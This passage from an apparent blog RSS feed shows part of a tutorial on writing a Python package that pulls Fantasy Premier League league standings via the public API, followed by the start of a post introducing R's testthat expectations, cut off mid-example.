games. More information can be found on the &lt;a href="https://fantasy.premierleague.com/" rel="external"&gt;website&lt;/a&gt;. There are multiple
endpoints available for accessing things like player data and fixture difficulty (there is a great summary of the API &lt;a href="https://www.oliverlooney.com/blogs/FPL-APIs-Explained" rel="external"&gt;here&lt;/a&gt;).
In fact, there is an existing Python package which uses them; check that out &lt;a href="https://fpl.readthedocs.io/en/latest/" rel="external"&gt;here&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;I am focusing on something that is not covered by the other packages (as far as I&amp;rsquo;m aware) and that&amp;rsquo;s the
league data. There is an endpoint for accessing the league table if you know your unique league ID:&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;https://fantasy.premierleague.com/api/leagues-classic/league_id/standings/
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;However, I want a summary of the league across the season so I can see progression throughout. This data
could then be used to create some season summaries. Conveniently, at the time of writing I am at the top of
the league I&amp;rsquo;ve entered with my friends, so I will appear at the top of the dataset that my function will return.&lt;/p&gt;
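&lt;p&gt;To actually add my function I&amp;rsquo;ll create a file in &lt;code&gt;src/fpl_league&lt;/code&gt; called &lt;code&gt;get_league.py&lt;/code&gt; and in here I&amp;rsquo;ll define my function
along with the imports it needs. Note that the function also uses &lt;code&gt;pandas&lt;/code&gt;, which should be added as a dependency in the same way as &lt;code&gt;requests&lt;/code&gt; (&lt;code&gt;poetry add pandas&lt;/code&gt;):&lt;/p&gt;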
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;requests&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;pandas&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;as&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;pd&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;json&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;get_season_league&lt;/span&gt;(league_id &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;485842&amp;#34;&lt;/span&gt;):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;    api_url &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;https://fantasy.premierleague.com/api/&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;    url &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; api_url &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;leagues-classic/&amp;#34;&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; league_id &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;/standings/&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;    response &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; requests&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;get(url)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;    data &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; json&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;loads(response&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;text)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;    league &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; pd&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;DataFrame(data[&lt;span style="color:#a5d6ff"&gt;&amp;#39;standings&amp;#39;&lt;/span&gt;][&lt;span style="color:#a5d6ff"&gt;&amp;#39;results&amp;#39;&lt;/span&gt;])
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;    df &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; pd&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;DataFrame([])
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;    &lt;span style="color:#ff7b72"&gt;for&lt;/span&gt; index, row &lt;span style="color:#ff7b72;font-weight:bold"&gt;in&lt;/span&gt; league&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;iterrows():
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;        player_query &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; api_url &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;entry/&amp;#34;&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; str(row[&lt;span style="color:#a5d6ff"&gt;&amp;#39;entry&amp;#39;&lt;/span&gt;]) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;/history&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;        player_response &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; requests&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;get(player_query)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;        player_data &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; json&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;loads(player_response&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;text)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;        player_df &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; pd&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;DataFrame({
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;            &lt;span style="color:#a5d6ff"&gt;&amp;#39;name&amp;#39;&lt;/span&gt;: row[&lt;span style="color:#a5d6ff"&gt;&amp;#39;player_name&amp;#39;&lt;/span&gt;],
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;            &lt;span style="color:#a5d6ff"&gt;&amp;#39;team_name&amp;#39;&lt;/span&gt;: row[&lt;span style="color:#a5d6ff"&gt;&amp;#39;entry_name&amp;#39;&lt;/span&gt;],
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;            &lt;span style="color:#a5d6ff"&gt;&amp;#39;event&amp;#39;&lt;/span&gt;: pd&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;json_normalize(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;                player_data[&lt;span style="color:#a5d6ff"&gt;&amp;#39;current&amp;#39;&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;            )[&lt;span style="color:#a5d6ff"&gt;&amp;#39;event&amp;#39;&lt;/span&gt;],
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;            &lt;span style="color:#a5d6ff"&gt;&amp;#39;points&amp;#39;&lt;/span&gt;: pd&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;json_normalize(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;                player_data[&lt;span style="color:#a5d6ff"&gt;&amp;#39;current&amp;#39;&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;            )[&lt;span style="color:#a5d6ff"&gt;&amp;#39;total_points&amp;#39;&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;        })
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;        df &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; pd&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;concat([df, player_df])
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;    &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt; df
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Without going into too much detail on the code, I am querying the API to get the current standings of the
league, then looping over each player and grabbing their weekly scores. The final output should have
5 rows per player (as there have only been 5 gameweeks so far) and look like this:&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th style="text-align: left"&gt;name&lt;/th&gt;
&lt;th style="text-align: left"&gt;team_name&lt;/th&gt;
&lt;th style="text-align: right"&gt;event&lt;/th&gt;
&lt;th style="text-align: right"&gt;points&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td style="text-align: left"&gt;Osheen Macoscar&lt;/td&gt;
&lt;td style="text-align: left"&gt;What’s the Mata?&lt;/td&gt;
&lt;td style="text-align: right"&gt;1&lt;/td&gt;
&lt;td style="text-align: right"&gt;69&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="text-align: left"&gt;Osheen Macoscar&lt;/td&gt;
&lt;td style="text-align: left"&gt;What’s the Mata?&lt;/td&gt;
&lt;td style="text-align: right"&gt;2&lt;/td&gt;
&lt;td style="text-align: right"&gt;137&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="text-align: left"&gt;Osheen Macoscar&lt;/td&gt;
&lt;td style="text-align: left"&gt;What’s the Mata?&lt;/td&gt;
&lt;td style="text-align: right"&gt;3&lt;/td&gt;
&lt;td style="text-align: right"&gt;202&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="text-align: left"&gt;Osheen Macoscar&lt;/td&gt;
&lt;td style="text-align: left"&gt;What’s the Mata?&lt;/td&gt;
&lt;td style="text-align: right"&gt;4&lt;/td&gt;
&lt;td style="text-align: right"&gt;284&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="text-align: left"&gt;Osheen Macoscar&lt;/td&gt;
&lt;td style="text-align: left"&gt;What’s the Mata?&lt;/td&gt;
&lt;td style="text-align: right"&gt;5&lt;/td&gt;
&lt;td style="text-align: right"&gt;337&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
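&lt;p&gt;To make the reshaping step concrete without calling the live API, here is a sketch in plain Python. The &lt;code&gt;sample_history&lt;/code&gt; payload is invented and only mimics the two fields the function above reads from each entry in &lt;code&gt;current&lt;/code&gt; (&lt;code&gt;event&lt;/code&gt; and &lt;code&gt;total_points&lt;/code&gt;); the real response is assumed to contain more. Both helper names are hypothetical. Since &lt;code&gt;total_points&lt;/code&gt; appears to be a running total in the table above, subtracting the previous gameweek gives the points scored in each week, which is one possible starting point for a season summary:&lt;/p&gt;

```python
def season_rows(player_name, team_name, history):
    """Build one row per gameweek, mirroring the columns in the table above."""
    return [
        {
            "name": player_name,
            "team_name": team_name,
            "event": gameweek["event"],
            "points": gameweek["total_points"],
        }
        for gameweek in history["current"]
    ]


def weekly_points(rows):
    """Convert running totals into the points scored in each gameweek."""
    weekly = []
    previous_total = 0
    for row in rows:
        weekly.append(row["points"] - previous_total)
        previous_total = row["points"]
    return weekly


# Invented payload (an assumption), reusing the totals from the table above.
sample_history = {
    "current": [
        {"event": 1, "total_points": 69},
        {"event": 2, "total_points": 137},
        {"event": 3, "total_points": 202},
        {"event": 4, "total_points": 284},
        {"event": 5, "total_points": 337},
    ]
}

rows = season_rows("Osheen Macoscar", "What’s the Mata?", sample_history)
print(len(rows))            # 5
print(weekly_points(rows))  # [69, 68, 65, 82, 53]
```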
&lt;h2 id="using-the-function"&gt;Using the Function&lt;/h2&gt;
&lt;p&gt;Now we&amp;rsquo;ve defined our function in the package, to use it we must enter the virtual environment and
import our function from the module:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;from&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;fpl_league.get_league&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; get_season_league
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We can also edit the &lt;code&gt;__init__.py&lt;/code&gt; so we don&amp;rsquo;t need to explicitly load the function from the &lt;code&gt;get_league&lt;/code&gt; module. So if we
add the above code to the &lt;code&gt;__init__.py&lt;/code&gt; file then all we need to do to load the function is:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;from&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;fpl_league&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; get_season_league
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;This makes it easier for users, as they won&amp;rsquo;t have to remember the module name and will have a little less to type.&lt;/p&gt;
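&lt;p&gt;To see the re-export in action without touching the real package, the sketch below builds a throwaway package in a temporary directory. The package name &lt;code&gt;demo_league&lt;/code&gt; and the stub function body are placeholders chosen for illustration, not the real &lt;code&gt;fpl_league&lt;/code&gt; code:&lt;/p&gt;

```python
import importlib
import sys
import tempfile
from pathlib import Path

with tempfile.TemporaryDirectory() as tmp:
    # Lay out a tiny package: demo_league/get_league.py and demo_league/__init__.py
    pkg = Path(tmp) / "demo_league"
    pkg.mkdir()
    (pkg / "get_league.py").write_text(
        "def get_season_league():\n    return 'league table'\n"
    )
    # The re-export: the same import line a user would otherwise have to type.
    (pkg / "__init__.py").write_text(
        "from demo_league.get_league import get_season_league\n"
    )

    # Make the temporary directory importable for the duration of the demo.
    sys.path.insert(0, tmp)
    try:
        demo_league = importlib.import_module("demo_league")
        # The function is now reachable from the top level of the package.
        result = demo_league.get_season_league()
    finally:
        sys.path.remove(tmp)

print(result)
```

&lt;p&gt;The only line doing the work is the one written into &lt;code&gt;__init__.py&lt;/code&gt;; everything else is scaffolding to keep the example self-contained.&lt;/p&gt;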
&lt;h2 id="next-up"&gt;Next Up&lt;/h2&gt;
&lt;p&gt;So far we&amp;rsquo;ve covered creating our package with Poetry, managing our development environment and adding a function.
In the next blog post we&amp;rsquo;ll be covering the next steps with package development including documentation,
testing and publishing to PyPI.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/python-package/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Testing with {testthat}</title><link>https://www.jumpingrivers.com/blog/r-testthat/</link><pubDate>Thu, 25 Sep 2025 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/r-testthat/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/r-testthat/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/r-testthat/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;One of our main projects at Jumping Rivers in the last year has been building the &lt;a href="https://www.jumpingrivers.com/litmus/" rel="external"&gt;litmus&lt;/a&gt;
platform for validation of R packages. When assessing the quality of code within a package, unit tests are
an important component, among other metrics of interest.
In this blog we discuss the main features of the &lt;code&gt;{testthat}&lt;/code&gt; package, a convenient way to test R code.&lt;/p&gt;
&lt;h1 id="testing-in-r"&gt;Testing in R&lt;/h1&gt;
&lt;p&gt;Testing is an important step when developing code in R or any other language. If you are a Python user, consider reading our previous
blogs on &lt;a href="https://www.jumpingrivers.com/blog/python-testing-advanced/" rel="external"&gt;pytest&lt;/a&gt;. Writing tests helps us make sure that the code is
working as expected. In the R ecosystem, the &lt;a href="https://testthat.r-lib.org/index.html" rel="external"&gt;testthat&lt;/a&gt; package is one of the most widely used
frameworks. In this blog we will explore some of the main features of &lt;code&gt;{testthat}&lt;/code&gt;, highlighting some of the most useful functions with examples.&lt;/p&gt;
&lt;p&gt;Before starting, note that although it is possible to use &lt;code&gt;{testthat}&lt;/code&gt; outside of an R package, it works best within one, so the directory structure of the code
and testing code should look like this:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;./testthatExample/
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;├── R/
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;│   ├── function1.R
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;│   └── function2.R
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;├── tests/
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;│   ├── testthat.R
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;│   └── testthat/
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;│       ├── test-function1.R
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;│       └── test-function2.R
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;└── DESCRIPTION
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;where the main functions, in our case &lt;code&gt;function1.R&lt;/code&gt; and &lt;code&gt;function2.R&lt;/code&gt;, are stored in &lt;code&gt;R/&lt;/code&gt; and the tests are stored under &lt;code&gt;tests/testthat/&lt;/code&gt;.
All tests should be contained in files whose names start with &lt;code&gt;test&lt;/code&gt;. Then, when we run &lt;code&gt;testthat::test_local()&lt;/code&gt; from the root directory,
or &lt;code&gt;devtools::test()&lt;/code&gt;, the tests are discovered automatically.&lt;/p&gt;
&lt;h2 id="installing-and-loading-testthat"&gt;Installing and Loading testthat&lt;/h2&gt;
&lt;p&gt;First, let&amp;rsquo;s install and load the package:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Install testthat &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;install.packages&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;testthat&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Load the package&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(testthat)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="basic-testthat-structure"&gt;Basic testthat Structure&lt;/h2&gt;
&lt;p&gt;The &lt;code&gt;testthat&lt;/code&gt; package is built around three main components:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Expectations&lt;/strong&gt;: The building blocks that check if a result matches what you expect&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Tests&lt;/strong&gt;: Groups of expectations that test a specific function or behavior&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Test files&lt;/strong&gt;: Collections of tests, typically organised by the functions they&amp;rsquo;re testing&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Let&amp;rsquo;s start with the most commonly used expectations:&lt;/p&gt;
&lt;h3 id="testing-equality"&gt;Testing Equality&lt;/h3&gt;
&lt;p&gt;The &lt;code&gt;expect_equal()&lt;/code&gt; function tests for near equality, which makes it a good fit for floating point numbers, while &lt;code&gt;expect_identical()&lt;/code&gt;
tests for exact equality.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;expect_equal&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;4&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;expect_identical&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;1L&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;2L&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;3L&lt;/span&gt;), &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
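&lt;p&gt;To make the difference concrete, here is a minimal sketch using the classic floating point example &lt;code&gt;0.1 + 0.2&lt;/code&gt;. The variable name &lt;code&gt;x&lt;/code&gt; is ours, and base R&amp;rsquo;s &lt;code&gt;identical()&lt;/code&gt; stands in for the exact comparison so that the snippet runs without a failing expectation.&lt;/p&gt;

```r
library(testthat)

# 0.1 + 0.2 is not stored as exactly 0.3 in floating point arithmetic
x = 0.1 + 0.2

# Passes: expect_equal() allows a small numerical tolerance
expect_equal(x, 0.3)

# An exact comparison sees two different numbers
expect_false(identical(x, 0.3))
```

&lt;p&gt;Swapping the first call for &lt;code&gt;expect_identical(x, 0.3)&lt;/code&gt; should make the expectation fail, which is rarely what you want for computed doubles.&lt;/p&gt;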
&lt;aside class="advert"&gt;
&lt;p&gt;
Need help with R package validation to unleash the power of open source? Check out the &lt;a href="https://www.jumpingrivers.com/litmus/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2025-r-testthat"&gt; Litmusverse suite of risk assessment tools&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h3 id="testing-errors-and-warnings"&gt;Testing Errors and Warnings&lt;/h3&gt;
&lt;p&gt;&lt;code&gt;expect_error()&lt;/code&gt; checks that the code throws an error, &lt;code&gt;expect_warning()&lt;/code&gt; checks for warnings and &lt;code&gt;expect_silent()&lt;/code&gt;
checks that the code produces no output, messages or warnings. Although it is better practice to test for specific error and warning messages,
we don&amp;rsquo;t &lt;em&gt;have&lt;/em&gt; to. In the code below, the first &lt;code&gt;expect_error()&lt;/code&gt; call and both &lt;code&gt;expect_warning()&lt;/code&gt; calls are not given a specific
message to check for, so they pass as long as the code raises any error or warning respectively.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;expect_error&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;log&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;not a number&amp;#34;&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;expect_error&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;stop&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;Something went wrong&amp;#34;&lt;/span&gt;), &lt;span style="color:#a5d6ff"&gt;&amp;#34;Something went wrong&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;expect_warning&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;log&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;-1&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;expect_warning&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;as.numeric&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;1&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;2&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;not_a_number&amp;#34;&lt;/span&gt;)))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;expect_silent&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="testing-data-types"&gt;Testing Data Types&lt;/h3&gt;
&lt;p&gt;The &lt;code&gt;expect_type()&lt;/code&gt; and &lt;code&gt;expect_[s3|s4|s7]_class()&lt;/code&gt; functions check whether the code returns an object of the expected base type, or one that inherits from a specified S3, S4 or S7 class.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;expect_type&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;), &lt;span style="color:#a5d6ff"&gt;&amp;#34;double&amp;#34;&lt;/span&gt;)
